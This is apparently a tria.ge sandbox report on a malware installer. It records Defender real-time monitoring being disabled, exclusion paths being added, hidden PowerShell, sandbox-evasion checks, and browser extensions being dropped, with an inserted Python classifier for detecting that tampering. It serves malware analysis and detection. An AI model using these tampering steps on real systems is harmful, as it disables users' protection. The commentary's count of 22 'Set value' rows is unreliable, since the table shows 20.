Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 226s
max time network: 229s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 04/07/2024, 22:36
Static task: static1
Behavioral task: behavioral1
Sample: 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe
Resource: win7-20240508-en
General
Target: 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe
Size: 7.2MB
MD5: 996233a65fee55d8bce4b872e4c117e1
SHA1: 95e894cb95f14cf1438e9b8d75a7594dcdaaf4e3
SHA256: 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d
SHA512: d832f158cdab5dc47776d336521942f548259cb6976f0e6bcafa67b6cc221fca58b438fad5829978fe4c97850c64477f953653b8421ed9267734a2352e538d7e
SSDEEP: 196608:91OZfn3rm11qJ2sIwxXzRCSQwmWtT7GkZbi0IFZU7P:3OZfn3Cy2pwmwT6kREUb
Malware Config
Signatures

Disables Windows Defender real-time monitoring via registry policy (4 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe

Adds Windows Defender exclusion paths via registry, in both the native and the Wow6432Node view (40 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATiuMetuMWHU2 = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UyPATDbiwjgOC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VcCVDDBRU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATiuMetuMWHU2 = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IchmcMfQaXUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UyPATDbiwjgOC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NonltQQlyMoZtVVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VcCVDDBRU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IchmcMfQaXUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NonltQQlyMoZtVVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
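The two tables above show the installer switching off real-time monitoring through the HKLM policy key and then whitelisting every directory it is about to drop into, writing each exclusion twice: once under SOFTWARE\Microsoft\Windows Defender and once under SOFTWARE\Wow6432Node. Defender reads the native (64-bit) view; the Wow6432Node copies are where a 32-bit reg.exe lands unless it is run with /reg:64, so a detection that watches only one view sees half the writes. A second caveat: the Windows 7 image used for this run has no Tamper Protection, which on current Windows 10/11 blocks these registry writes when they come from anything other than Defender itself. The Python below is an added example, not code from the report or from Hatching: it classifies report-style registry events (operation, key path, data, process) for Defender tampering and folds the two views into one effective exclusion set. The sample events are constructed from the rows above; the Finding class and the function names are this example's own.

```python
"""Classify sandbox registry events for Windows Defender tampering.

Added example, not code from the report. Each event is (operation, key path,
data, process), the columns of the signature tables above; the sample events
are constructed from rows of those tables.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, Optional, Set, Tuple

Event = Tuple[str, str, Optional[str], str]

# Defender reads the native (64-bit) view. A 32-bit reg.exe without /reg:64 is
# redirected to Wow6432Node, so the same exclusion shows up under both spellings.
_WOW = re.compile(r"\\Wow6432Node(?=\\Microsoft\\Windows Defender\\)", re.IGNORECASE)
_POLICY_RTP = re.compile(
    r"\\Policies\\Microsoft\\Windows Defender\\Real-time Protection\\(\w+)$", re.IGNORECASE)
_EXCLUSION = re.compile(
    r"\\Microsoft\\Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\\(.+)$", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    kind: str          # "realtime-monitoring-disabled" or "exclusion-<type>-added"
    detail: str        # the policy value, or the excluded path/extension/process
    process: str
    wow64_view: bool   # True when the write landed in Wow6432Node


def classify_event(operation: str, key_path: str, data: Optional[str], process: str) -> Optional[Finding]:
    """Return a Finding for an event that weakens Defender, else None.

    Only 'Set value' events count: 'Key created' on the exclusion containers
    precedes every write and carries no information on its own.
    """
    if not operation.startswith("Set value"):
        return None
    wow64 = bool(_WOW.search(key_path))
    path = _WOW.sub("", key_path)  # fold both views onto the native key
    m = _POLICY_RTP.search(path)
    if m and m.group(1).lower() == "disablerealtimemonitoring" and data == "1":
        return Finding("realtime-monitoring-disabled", f"{m.group(1)}={data}", process, wow64)
    m = _EXCLUSION.search(path)
    if m:
        return Finding(f"exclusion-{m.group(1).lower()}-added", m.group(2), process, wow64)
    return None


def effective_exclusions(events: Iterable[Event]) -> Dict[str, Set[str]]:
    """Collapse native and Wow6432Node writes into one set per exclusion type."""
    out: Dict[str, Set[str]] = {}
    for ev in events:
        f = classify_event(*ev)
        if f is not None and f.kind.startswith("exclusion-"):
            out.setdefault(f.kind.split("-")[1], set()).add(f.detail)
    return out


SAMPLE_EVENTS: Tuple[Event, ...] = (  # constructed from the report rows above
    ("Key created", r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection", None, "reg.exe"),
    ("Set value (int)", r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring", "1", "reg.exe"),
    ("Key created", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths", None, "reg.exe"),
    ("Set value (int)", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATiuMetuMWHU2", "0", "reg.exe"),
    ("Set value (int)", r"\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATiuMetuMWHU2", "0", "reg.exe"),
    ("Set value (int)", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions", "0", "reg.exe"),
    ("Set value (int)", r"\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", "0", "JyKDiOp.exe"),
)

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify_event(*ev))
    print(effective_exclusions(SAMPLE_EVENTS))
```

On the sample events the classifier reports one real-time-monitoring finding and one exclusion path per view, and effective_exclusions() returns the two distinct paths; the Internet Settings write from JyKDiOp.exe is ignored. The same functions work on the full 40-row table above, where they reduce the 22 "Set value" rows to nine distinct excluded directories.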
Blocklisted process makes network request (1 IoC)
flow | pid | Process
27 | 2340 | rundll32.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
Runs PowerShell with its display window hidden.
pid | Process
2036 | powershell.exe
2068 | powershell.exe
2788 | powershell.exe
2256 | powershell.EXE
1376 | powershell.EXE
1688 | powershell.exe
2084 | powershell.EXE
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandbox environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, most likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Control Panel\International\Geo\Nation | JyKDiOp.exe
Executes dropped EXE (4 IoCs)
pid | Process
3004 | Install.exe
2144 | Install.exe
2472 | tgOgpoU.exe
2228 | JyKDiOp.exe
Loads dropped DLL (23 IoCs)
pid | Process
2848 | 57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe
3004 | Install.exe
3004 | Install.exe
3004 | Install.exe
3004 | Install.exe
2144 | Install.exe
2144 | Install.exe
2144 | Install.exe
2116 | WerFault.exe
2116 | WerFault.exe
2116 | WerFault.exe
2340 | rundll32.exe
2340 | rundll32.exe
2340 | rundll32.exe
2340 | rundll32.exe
316 | WerFault.exe
316 | WerFault.exe
316 | WerFault.exe
316 | WerFault.exe
316 | WerFault.exe
1284 | WerFault.exe
1284 | WerFault.exe
1284 | WerFault.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension (2 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | JyKDiOp.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | JyKDiOp.exe
Drops file in System32 directory (24 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | tgOgpoU.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | JyKDiOp.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | tgOgpoU.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | tgOgpoU.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | JyKDiOp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | JyKDiOp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 | JyKDiOp.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 | JyKDiOp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | JyKDiOp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 | JyKDiOp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 | JyKDiOp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 | JyKDiOp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | rundll32.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | JyKDiOp.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | JyKDiOp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 | JyKDiOp.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | tgOgpoU.exe
Drops file in Program Files directory (13 IoCs)
description | ioc | Process
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | JyKDiOp.exe
File created | C:\Program Files (x86)\VcCVDDBRU\VVBajwS.xml | JyKDiOp.exe
File created | C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\KyHeSQO.dll | JyKDiOp.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | JyKDiOp.exe
File created | C:\Program Files (x86)\ATiuMetuMWHU2\SunBWXR.xml | JyKDiOp.exe
File created | C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\jaKjrah.xml | JyKDiOp.exe
File created | C:\Program Files (x86)\UyPATDbiwjgOC\blIehCe.xml | JyKDiOp.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | JyKDiOp.exe
File created | C:\Program Files (x86)\ATiuMetuMWHU2\hDmySLvUUGMVf.dll | JyKDiOp.exe
File created | C:\Program Files (x86)\VcCVDDBRU\DyLUGV.dll | JyKDiOp.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | JyKDiOp.exe
File created | C:\Program Files (x86)\UyPATDbiwjgOC\yRrrnvz.dll | JyKDiOp.exe
File created | C:\Program Files (x86)\IchmcMfQaXUn\tklAOFS.dll | JyKDiOp.exe
Drops file in Windows directory (4 IoCs)
description | ioc | Process
File created | C:\Windows\Tasks\bmQWCxleEgxbTUrSZz.job | schtasks.exe
File created | C:\Windows\Tasks\nsbPTSdSgPuDRRbhc.job | schtasks.exe
File created | C:\Windows\Tasks\RShenKKeUbJzTjI.job | schtasks.exe
File created | C:\Windows\Tasks\ROHimGgVjIIdgMKwK.job | schtasks.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (3 IoCs)
pid | pid_target | Process | procid_target
2116 | 2472 | WerFault.exe | 41
316 | 2144 | WerFault.exe | 29
1284 | 2228 | WerFault.exe | 185
Enumerates system info in registry (2 TTPs, 4 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Modifies data under HKEY_USERS (64 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | tgOgpoU.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | tgOgpoU.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | JyKDiOp.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\32-ee-0b-4f-68-e6 | rundll32.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | JyKDiOp.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0099000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | JyKDiOp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionReason = "1" | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadNetworkName = "Network 3" | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6 | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecision = "0" | rundll32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecision = "0" | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | JyKDiOp.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | JyKDiOp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecisionReason = "1" | JyKDiOp.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | JyKDiOp.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecisionTime = e09ec3fa62ceda01 | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | JyKDiOp.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | JyKDiOp.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | rundll32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | JyKDiOp.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionTime = e09ec3fa62ceda01 | rundll32.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDetectedUrl | rundll32.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80b687e862ceda01 | powershell.exe
